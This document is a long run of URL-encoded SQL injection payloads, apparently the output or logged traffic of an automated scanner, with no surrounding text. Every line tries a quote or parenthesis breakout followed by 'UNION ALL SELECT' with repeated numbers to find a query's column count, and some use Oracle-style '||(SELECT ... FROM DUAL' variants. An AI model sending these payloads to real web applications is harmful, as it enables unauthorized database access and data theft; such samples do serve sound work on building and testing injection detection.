-6292%27%29%20WHERE%203510%3D3510%20UNION%20ALL%20SELECT%203510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%23 -6022%27%29%20WHERE%209077%3D9077%20UNION%20ALL%20SELECT%209077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%2C9077%23 -4112%22%29%20WHERE%207349%3D7349%20UNION%20ALL%20SELECT%207349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%2C7349%23 -2650%22%29%20WHERE%208573%3D8573%20UNION%20ALL%20SELECT%208573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%2C8573%23 -8213%22%29%20WHERE%202815%3D2815%20UNION%20ALL%20SELECT%202815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%23 -7389%22%29%20WHERE%202150%3D2150%20UNION%20ALL%20SELECT%202150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150%23 -8577%22%29%20WHERE%209631%3D9631%20UNION%20ALL%20SELECT%209631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%2C9631%23 -6715%22%29%20WHERE%204033%3D4033%20UNION%20ALL%20SELECT%204033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%23 -9196%22%29%20WHERE%204289%3D4289%20UNION%20ALL%20SELECT%204289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%23 -9574%22%29%20WHERE%204576%3D4576%20UNION%20ALL%20SELECT%204576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%23 -3778%22%29%20WHERE%209081%3D9081%20UNION%20ALL%20SELECT%209081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%23 -5915%22%29%20WHERE%208752%3D8752%20UNION%20ALL%20SELECT%208752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%2C8752%23 -7703%29%20WHERE%208850%3D8850%20UNION%20ALL%20SELECT%208850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%23 -2184%29%20WHERE%208492%3D8492%20UNION%20ALL%20SELECT%208492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%2C8492%23 -1065%29%20WHERE%207021%3D7021%20UNION%20ALL%20SELECT%207021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%23 -4136%29%20WHERE%207906%3D7906%20UNION%20ALL%20SELECT%207906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%2C7906%23 -2706%29%20WHERE%209794%3D9794%20UNION%20ALL%20SELECT%209794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%23 -5195%29%20WHERE%201456%3D1456%20UNION%20ALL%20SELECT%201456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%2C1456%23 -4172%29%20WHERE%209134%3D9134%20UNION%20ALL%20SELECT%209134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%23 -7627%29%20WHERE%208301%3D8301%20UNION%20ALL%20SELECT%208301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%23 -7650%29%20WHERE%204635%3D4635%20UNION%20ALL%20SELECT%204635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%23 -5027%29%20WHERE%202490%3D2490%20UNION%20ALL%20SELECT%202490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%23 -9081%27%20WHERE%205076%3D5076%20UNION%20ALL%20SELECT%205076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%23 -3032%27%20WHERE%205366%3D5366%20UNION%20ALL%20SELECT%205366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%23 -9167%27%20WHERE%206400%3D6400%20UNION%20ALL%20SELECT%206400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%23 -8026%27%20WHERE%206474%3D6474%20UNION%20ALL%20SELECT%206474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%2C6474%23 -9589%27%20WHERE%202747%3D2747%20UNION%20ALL%20SELECT%202747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%23 -3344%27%20WHERE%203650%3D3650%20UNION%20ALL%20SELECT%203650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%2C3650%23 -5898%27%20WHERE%202673%3D2673%20UNION%20ALL%20SELECT%202673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%2C2673%23 -8189%27%20WHERE%202540%3D2540%20UNION%20ALL%20SELECT%202540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%23 -7490%27%20WHERE%208552%3D8552%20UNION%20ALL%20SELECT%208552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%23 -9971%27%20WHERE%206245%3D6245%20UNION%20ALL%20SELECT%206245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%23 -3994%22%20WHERE%206283%3D6283%20UNION%20ALL%20SELECT%206283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%23 -6646%22%20WHERE%209181%3D9181%20UNION%20ALL%20SELECT%209181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%23 -3599%22%20WHERE%206400%3D6400%20UNION%20ALL%20SELECT%206400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%23 -5682%22%20WHERE%203997%3D3997%20UNION%20ALL%20SELECT%203997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%23 -1817%22%20WHERE%209509%3D9509%20UNION%20ALL%20SELECT%209509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%2C9509%23 -7230%22%20WHERE%202863%3D2863%20UNION%20ALL%20SELECT%202863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%2C2863%23 -1387%22%20WHERE%208222%3D8222%20UNION%20ALL%20SELECT%208222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%23 -4748%22%20WHERE%205483%3D5483%20UNION%20ALL%20SELECT%205483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%23 -8418%22%20WHERE%207441%3D7441%20UNION%20ALL%20SELECT%207441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%23 -2816%22%20WHERE%204853%3D4853%20UNION%20ALL%20SELECT%204853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%2C4853%23 -9621%20WHERE%201673%3D1673%20UNION%20ALL%20SELECT%201673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%2C1673%23 -1933%20WHERE%209470%3D9470%20UNION%20ALL%20SELECT%209470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%23 -8840%20WHERE%207742%3D7742%20UNION%20ALL%20SELECT%207742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%23 -2384%20WHERE%207352%3D7352%20UNION%20ALL%20SELECT%207352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352%23 -5918%20WHERE%205903%3D5903%20UNION%20ALL%20SELECT%205903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%23 -2852%20WHERE%202448%3D2448%20UNION%20ALL%20SELECT%202448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%2C2448%23 -6024%20WHERE%208379%3D8379%20UNION%20ALL%20SELECT%208379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%23 -1681%20WHERE%207515%3D7515%20UNION%20ALL%20SELECT%207515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%23 -3329%20WHERE%205423%3D5423%20UNION%20ALL%20SELECT%205423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%23 -1744%20WHERE%205851%3D5851%20UNION%20ALL%20SELECT%205851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%23 -7007%27%7C%7C%28SELECT%20%27XeFk%27%20FROM%20DUAL%20WHERE%205201%3D5201%20UNION%20ALL%20SELECT%205201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%2C5201%23 -7563%27%7C%7C%28SELECT%20%27XqcM%27%20FROM%20DUAL%20WHERE%202379%3D2379%20UNION%20ALL%20SELECT%202379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%23 -4835%27%7C%7C%28SELECT%20%27dwxU%27%20FROM%20DUAL%20WHERE%208375%3D8375%20UNION%20ALL%20SELECT%208375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%23 -9250%27%7C%7C%28SELECT%20%27BobI%27%20FROM%20DUAL%20WHERE%203339%3D3339%20UNION%20ALL%20SELECT%203339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%2C3339%23 -3868%27%7C%7C%28SELECT%20%27eavW%27%20FROM%20DUAL%20WHERE%201990%3D1990%20UNION%20ALL%20SELECT%201990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%23 -9932%27%7C%7C%28SELECT%20%27llCR%27%20FROM%20DUAL%20WHERE%205406%3D5406%20UNION%20ALL%20SELECT%205406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%2C5406%23 -7674%27%7C%7C%28SELECT%20%27Eyhm%27%20FROM%20DUAL%20WHERE%204985%3D4985%20UNION%20ALL%20SELECT%204985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%2C4985%23 -6036%27%7C%7C%28SELECT%20%27jyXF%27%20FROM%20DUAL%20WHERE%205357%3D5357%20UNION%20ALL%20SELECT%205357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%2C5357%23 -1199%27%7C%7C%28SELECT%20%27vxHP%27%20FROM%20DUAL%20WHERE%203984%3D3984%20UNION%20ALL%20SELECT%203984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%23 -6969%27%7C%7C%28SELECT%20%27oXvB%27%20FROM%20DUAL%20WHERE%204386%3D4386%20UNION%20ALL%20SELECT%204386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%23 -7930%27%7C%7C%28SELECT%20%27JoTJ%27%20WHERE%203385%3D3385%20UNION%20ALL%20SELECT%203385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%23 -2614%27%7C%7C%28SELECT%20%27KVGL%27%20WHERE%209536%3D9536%20UNION%20ALL%20SELECT%209536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%23 -3414%27%7C%7C%28SELECT%20%27exJJ%27%20WHERE%207438%3D7438%20UNION%20ALL%20SELECT%207438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%2C7438%23 -3756%27%7C%7C%28SELECT%20%27XuBt%27%20WHERE%209626%3D9626%20UNION%20ALL%20SELECT%209626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%23 -5179%27%7C%7C%28SELECT%20%27FvZz%27%20WHERE%201997%3D1997%20UNION%20ALL%20SELECT%201997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%23 -9977%27%7C%7C%28SELECT%20%27vBku%27%20WHERE%206357%3D6357%20UNION%20ALL%20SELECT%206357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%2C6357%23 